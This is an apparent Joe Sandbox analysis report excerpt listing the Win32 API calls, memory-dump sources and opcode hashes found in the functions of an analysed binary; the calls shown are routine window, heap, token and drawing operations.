                                                • Opcode Fuzzy Hash: 4690d1f04d452f7130f5e8eda3d6dce698ed176c45c72cb382b4a5dfd1410890
                                                • Instruction Fuzzy Hash: 1A31CD71A00219EFCB00CFACD998ADE3FB5FB55314F108229FA25AB2D0C7709945EB90
                                                APIs
                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 005A5745
                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 005A579D
                                                • _wcslen.LIBCMT ref: 005A57AF
                                                • _wcslen.LIBCMT ref: 005A57BA
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 005A5816
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: MessageSend$_wcslen
                                                • String ID:
                                                • API String ID: 763830540-0
                                                • Opcode ID: 56df450c6b26b099d33aa84421eb53186bcf6070b79e5e17adef38816cd82d0d
                                                • Instruction ID: a4284232c3d5620534d9205d8c27ffa105127e8976dad31e93bdc0d7ede0f324
                                                • Opcode Fuzzy Hash: 56df450c6b26b099d33aa84421eb53186bcf6070b79e5e17adef38816cd82d0d
                                                • Instruction Fuzzy Hash: EF219331904618DADB208F64DC84EEE7FB8FF56320F108616F919EB180E7709985CF50
                                                APIs
                                                • IsWindow.USER32(00000000), ref: 00590951
                                                • GetForegroundWindow.USER32 ref: 00590968
                                                • GetDC.USER32(00000000), ref: 005909A4
                                                • GetPixel.GDI32(00000000,?,00000003), ref: 005909B0
                                                • ReleaseDC.USER32(00000000,00000003), ref: 005909E8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Window$ForegroundPixelRelease
                                                • String ID:
                                                • API String ID: 4156661090-0
                                                • Opcode ID: 04ef9c01de7544c68aa15d2e3ad33063e8de2b277dcde7cc869954cf848ff025
                                                • Instruction ID: 5b628a112ce0d0d5a01c5e1db127711a9e8f6c3e44d1a8b7dd4bb2a884670cdb
                                                • Opcode Fuzzy Hash: 04ef9c01de7544c68aa15d2e3ad33063e8de2b277dcde7cc869954cf848ff025
                                                • Instruction Fuzzy Hash: 8C218435600204AFEB04EF69C949AAEBFF9FF85700F048468E84AA7352DB30EC44DB50
                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 0054CDC6
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0054CDE9
                                                  • Part of subcall function 00543820: RtlAllocateHeap.NTDLL(00000000,?,005E1444,?,0052FDF5,?,?,0051A976,00000010,005E1440,005113FC,?,005113C6,?,00511129), ref: 00543852
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0054CE0F
                                                • _free.LIBCMT ref: 0054CE22
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0054CE31
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                • String ID:
                                                • API String ID: 336800556-0
                                                • Opcode ID: 7959bd8c376b5cce12c976a6576b44b613f91bd1c97f61c912111dcd1c1dd492
                                                • Instruction ID: ff3b122b98d15f41fd89ee0a481dabfdb451f0f5dca1c607a42411067adcf822
                                                • Opcode Fuzzy Hash: 7959bd8c376b5cce12c976a6576b44b613f91bd1c97f61c912111dcd1c1dd492
                                                • Instruction Fuzzy Hash: 3E0184726032157F276216B66C8CDBB7D6DFEC7BA93150129F905C7201EF618D1291B0
                                                APIs
                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00529693
                                                • SelectObject.GDI32(?,00000000), ref: 005296A2
                                                • BeginPath.GDI32(?), ref: 005296B9
                                                • SelectObject.GDI32(?,00000000), ref: 005296E2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ObjectSelect$BeginCreatePath
                                                • String ID:
                                                • API String ID: 3225163088-0
                                                • Opcode ID: 700be6cb469864f891a56b2127dd2869d07d1816ded742b45bc34b87be9aa036
                                                • Instruction ID: 9deb3f3eb4187ff1688620d40598047957678a1737c4e9376a05da9ae058af06
                                                • Opcode Fuzzy Hash: 700be6cb469864f891a56b2127dd2869d07d1816ded742b45bc34b87be9aa036
                                                • Instruction Fuzzy Hash: 7D21B331901759EBDB118F64EC48BAD3FA4BF22315F100215F450DA2F1D3706889EF98
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _memcmp
                                                • String ID:
                                                • API String ID: 2931989736-0
                                                • Opcode ID: c18d710ded64dc96bc542cf3b5c065ebfa722cd7cb7082d48ba48316ec425213
                                                • Instruction ID: fcb6afef9bf14232aed0a2565e7e3c0099bc22d36e1514db90967f5f2333a981
                                                • Opcode Fuzzy Hash: c18d710ded64dc96bc542cf3b5c065ebfa722cd7cb7082d48ba48316ec425213
                                                • Instruction Fuzzy Hash: F001B5A1645A0ABBE20C5521AD86FBF7B5CFB613E4F008420FE0D9A241F7A1ED1093B4
                                                APIs
                                                • GetLastError.KERNEL32(?,?,?,0053F2DE,00543863,005E1444,?,0052FDF5,?,?,0051A976,00000010,005E1440,005113FC,?,005113C6), ref: 00542DFD
                                                • _free.LIBCMT ref: 00542E32
                                                • _free.LIBCMT ref: 00542E59
                                                • SetLastError.KERNEL32(00000000,00511129), ref: 00542E66
                                                • SetLastError.KERNEL32(00000000,00511129), ref: 00542E6F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free
                                                • String ID:
                                                • API String ID: 3170660625-0
                                                • Opcode ID: 76c2689cfbad3c8a1f9cb3947a359a94b925a4d4da3c3d8d4333b21a5c38109b
                                                • Instruction ID: 7094b51df13324a460dbb4d6c166e14bc6fde269b9d143d75abd364b87b12f74
                                                • Opcode Fuzzy Hash: 76c2689cfbad3c8a1f9cb3947a359a94b925a4d4da3c3d8d4333b21a5c38109b
                                                • Instruction Fuzzy Hash: 9A01263210562267871263752C49DFB3E6DBBE13ACFA04426F41593192EE708C149020
                                                APIs
                                                • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?,?,0057035E), ref: 0057002B
                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?), ref: 00570046
                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?), ref: 00570054
                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?), ref: 00570064
                                                • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?), ref: 00570070
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                • String ID:
                                                • API String ID: 3897988419-0
                                                • Opcode ID: 6537f40b0cda1fb16244e354d73a21bc9fd15649829f3c76dd819279baac11ba
                                                • Instruction ID: 693e5b2af9e0729885dc1859e284c5da0ef7a492c6ca17c16235ec61ae867d90
                                                • Opcode Fuzzy Hash: 6537f40b0cda1fb16244e354d73a21bc9fd15649829f3c76dd819279baac11ba
                                                • Instruction Fuzzy Hash: 46018B72600205FFDB104F69EC08BAA7EEDFB547A2F14A124F909D2250EB75DD44BBA0
                                                APIs
                                                • QueryPerformanceCounter.KERNEL32(?), ref: 0057E997
                                                • QueryPerformanceFrequency.KERNEL32(?), ref: 0057E9A5
                                                • Sleep.KERNEL32(00000000), ref: 0057E9AD
                                                • QueryPerformanceCounter.KERNEL32(?), ref: 0057E9B7
                                                • Sleep.KERNEL32 ref: 0057E9F3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                • String ID:
                                                • API String ID: 2833360925-0
                                                • Opcode ID: 3293825c91df3bfa04182e8f917a2a17ab8bd7763472831cac6621a360356396
                                                • Instruction ID: 1a027cc55a0d5889e96598723f7ee57a72e8a5a2f720b357d7223f34b26a0757
                                                • Opcode Fuzzy Hash: 3293825c91df3bfa04182e8f917a2a17ab8bd7763472831cac6621a360356396
                                                • Instruction Fuzzy Hash: 71015B72D01629DBCF009BE4E85AADDBF78BF1E301F004586E606B2241CB309559EB61
                                                APIs
                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00571114
                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 00571120
                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 0057112F
                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 00571136
                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0057114D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 842720411-0
                                                • Opcode ID: f6a2cf74d7a01e6596447bdf6e8af8dfe1c6b489c74989028028e8569a8ae2f5
                                                • Instruction ID: c6136f9fc9b8287e4255750945e0d6448a2bf261b42c9600f0abccdcd726c832
                                                • Opcode Fuzzy Hash: f6a2cf74d7a01e6596447bdf6e8af8dfe1c6b489c74989028028e8569a8ae2f5
                                                • Instruction Fuzzy Hash: 08011975200605BFDB114FA9EC49A6A3F6EFF8A3A0B604419FA45D7360DA31DD04EA60
                                                APIs
                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00570FCA
                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00570FD6
                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00570FE5
                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00570FEC
                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00571002
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 44706859-0
                                                • Opcode ID: c45069ca284d4fd7f6399ac621f8fbb70e8bc9340150943286064622f09ba86d
                                                • Instruction ID: fb6028b963192fc27c0e25af8a7c0bd5262cba8585d98445d484def58dba836d
                                                • Opcode Fuzzy Hash: c45069ca284d4fd7f6399ac621f8fbb70e8bc9340150943286064622f09ba86d
                                                • Instruction Fuzzy Hash: 7CF04935200701ABDB214FA9AC4DF5A3FADFF9A762F104415FA49C6251EE70DC54AA60
                                                APIs
                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0057102A
                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00571036
                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00571045
                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0057104C
                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00571062
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 44706859-0
                                                • Opcode ID: d5f4b3ebc07cdc12eb6636ac184be9f7786526de063174e18f9b7b78d1e892d5
                                                • Instruction ID: 2fa8470c3eb9a693007dc5b96c8b49590f76c8b5d46856077688edcdbde6c1f6
                                                • Opcode Fuzzy Hash: d5f4b3ebc07cdc12eb6636ac184be9f7786526de063174e18f9b7b78d1e892d5
                                                • Instruction Fuzzy Hash: 9DF04935200701ABDB215FAAEC4DF5A3FADFF9A761F104415FA49C6250DE70D854AA60
                                                APIs
                                                • CloseHandle.KERNEL32(?,?,?,?,0058017D,?,005832FC,?,00000001,00552592,?), ref: 00580324
                                                • CloseHandle.KERNEL32(?,?,?,?,0058017D,?,005832FC,?,00000001,00552592,?), ref: 00580331
                                                • CloseHandle.KERNEL32(?,?,?,?,0058017D,?,005832FC,?,00000001,00552592,?), ref: 0058033E
                                                • CloseHandle.KERNEL32(?,?,?,?,0058017D,?,005832FC,?,00000001,00552592,?), ref: 0058034B
                                                • CloseHandle.KERNEL32(?,?,?,?,0058017D,?,005832FC,?,00000001,00552592,?), ref: 00580358
                                                • CloseHandle.KERNEL32(?,?,?,?,0058017D,?,005832FC,?,00000001,00552592,?), ref: 00580365
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID:
                                                • API String ID: 2962429428-0
                                                • Opcode ID: 7834c3ed929462e4082d5966cb35c3af576849a463b1935eef56009c7957ac67
                                                • Instruction ID: 63279650871853044fdf335bb996c966c14b476cf46726462eed549cd631cf13
                                                • Opcode Fuzzy Hash: 7834c3ed929462e4082d5966cb35c3af576849a463b1935eef56009c7957ac67
                                                • Instruction Fuzzy Hash: 10019C72801B159FCB30AF66D880816FBF9BE602163159E3FD19662971CBB1A958DF80
                                                APIs
                                                • _free.LIBCMT ref: 0054D752
                                                  • Part of subcall function 005429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000), ref: 005429DE
                                                  • Part of subcall function 005429C8: GetLastError.KERNEL32(00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000,00000000), ref: 005429F0
                                                • _free.LIBCMT ref: 0054D764
                                                • _free.LIBCMT ref: 0054D776
                                                • _free.LIBCMT ref: 0054D788
                                                • _free.LIBCMT ref: 0054D79A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 0e09515219e6085af8511fe0c43ee2f152e8a18f32f9bde6045214b719798093
                                                • Instruction ID: 13e23af86243c5d14f9ed30e9a6b8df4a749c514032d72bdaff7f8b76eb33a5f
                                                • Opcode Fuzzy Hash: 0e09515219e6085af8511fe0c43ee2f152e8a18f32f9bde6045214b719798093
                                                • Instruction Fuzzy Hash: 46F04F32541216AB8621EB65F9C5D967FFDFB44318BD40806F049D7502C734FC809670
                                                APIs
                                                • GetDlgItem.USER32(?,000003E9), ref: 00575C58
                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00575C6F
                                                • MessageBeep.USER32(00000000), ref: 00575C87
                                                • KillTimer.USER32(?,0000040A), ref: 00575CA3
                                                • EndDialog.USER32(?,00000001), ref: 00575CBD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                • String ID:
                                                • API String ID: 3741023627-0
                                                • Opcode ID: ac88b2363bdaaa7499b7834fec45fe70df19d3109fe8213ee3b6bd6814aee176
                                                • Instruction ID: fb1d42a86d788f89ca4a9de9a2f5bc9cf14a09e9d727cd8c61a7b81790096234
                                                • Opcode Fuzzy Hash: ac88b2363bdaaa7499b7834fec45fe70df19d3109fe8213ee3b6bd6814aee176
                                                • Instruction Fuzzy Hash: 88018630500B04ABEB215B14ED4EFA67FFCBB11B05F044559A587A20E1EBF0AD88AA90
                                                APIs
                                                • _free.LIBCMT ref: 005422BE
                                                  • Part of subcall function 005429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000), ref: 005429DE
                                                  • Part of subcall function 005429C8: GetLastError.KERNEL32(00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000,00000000), ref: 005429F0
                                                • _free.LIBCMT ref: 005422D0
                                                • _free.LIBCMT ref: 005422E3
                                                • _free.LIBCMT ref: 005422F4
                                                • _free.LIBCMT ref: 00542305
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 6a2b031925cebc4a2d359f9b5ac1a6920efaee68420e7bb23758ae22cf4c424d
                                                • Instruction ID: 6e6b9053c052ea30b8df7a7fa076dd89f6a959f781c5bc0cc975154efe4965d6
                                                • Opcode Fuzzy Hash: 6a2b031925cebc4a2d359f9b5ac1a6920efaee68420e7bb23758ae22cf4c424d
                                                • Instruction Fuzzy Hash: 66F0B4784015B29B8A26AF56BC8188C3F74F738764F801107F058DA2B1C7710496FFE8
                                                APIs
                                                • EndPath.GDI32(?), ref: 005295D4
                                                • StrokeAndFillPath.GDI32(?,?,005671F7,00000000,?,?,?), ref: 005295F0
                                                • SelectObject.GDI32(?,00000000), ref: 00529603
                                                • DeleteObject.GDI32 ref: 00529616
                                                • StrokePath.GDI32(?), ref: 00529631
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                • String ID:
                                                • API String ID: 2625713937-0
                                                • Opcode ID: 1de2066f372abafc33b299c12c1ac75a756c330819fcff9d7bc5cd86e80e004b
